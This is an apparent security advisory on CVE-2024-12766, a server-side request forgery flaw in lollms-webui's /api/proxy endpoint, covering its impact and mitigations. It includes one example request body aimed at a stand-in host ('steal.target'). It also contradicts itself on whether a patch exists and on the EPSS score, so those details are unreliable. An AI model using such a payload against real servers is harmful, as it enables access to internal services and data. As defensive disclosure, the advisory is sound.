CVE-2024-12766 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in parisneo's lollms-webui, specifically within the /api/proxy REST API. This flaw allows attackers to leverage the server's credentials to access internal or external resources they shouldn't have access to. The vulnerability impacts versions of lollms-webui up to the latest release (V13, feather) and requires immediate attention.
The SSRF vulnerability in lollms-webui allows an attacker to craft malicious requests through the /api/proxy endpoint. By manipulating the url parameter within a POST request (e.g., {"url":"http://steal.target"}), an attacker can force the server to make requests to arbitrary internal or external URLs. This can lead to the exposure of sensitive data, unauthorized access to internal services, and potentially even the execution of malicious code on systems accessible from the lollms-webui server. The impact is amplified if the server has access to privileged credentials or is part of a larger, interconnected network, enabling lateral movement and a wider blast radius.
CVE-2024-12766 was publicly disclosed on 2025-03-20. There is currently no indication of active exploitation or listing on KEV. The EPSS score is pending evaluation. Public proof-of-concept (PoC) code is not yet available, but the vulnerability's nature makes it likely that PoCs will emerge. Monitor security advisories and vulnerability databases for updates.
Exploit Status
EPSS
0.12% (32% percentile)
CISA SSVC
CVSS Vector
While a direct patch for CVE-2024-12766 is pending, several mitigation strategies can reduce the risk. The most effective is to restrict outbound network access from the lollms-webui server, limiting its ability to make requests to external resources. Implement strict URL validation on the /api/proxy endpoint, rejecting requests with invalid or suspicious URLs. Consider using a Web Application Firewall (WAF) to filter malicious requests and block SSRF attempts. Regularly review and update the server's configuration, ensuring that security mechanisms like forbidremoteaccess and check_access are properly configured and enforced. After implementing these workarounds, verify their effectiveness by attempting to trigger the SSRF vulnerability with a controlled, non-harmful URL.
Update the lollms-webui library to the latest available version. This should include the fix for the SSRF vulnerability. Refer to the release notes for more details on the update and additional mitigations.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-12766 is a Server-Side Request Forgery (SSRF) vulnerability in the /api/proxy endpoint of lollms-webui versions up to the latest, allowing attackers to make requests on behalf of the server.
If you are running lollms-webui version V13 (feather) or earlier, you are potentially affected by this SSRF vulnerability.
A direct patch is pending. Mitigate by restricting outbound network access, validating URLs, and using a WAF.
There is currently no confirmed evidence of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the parisneo/lollms-webui repository and relevant security forums for updates and advisories.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your requirements.txt file and we'll tell you instantly if you're affected.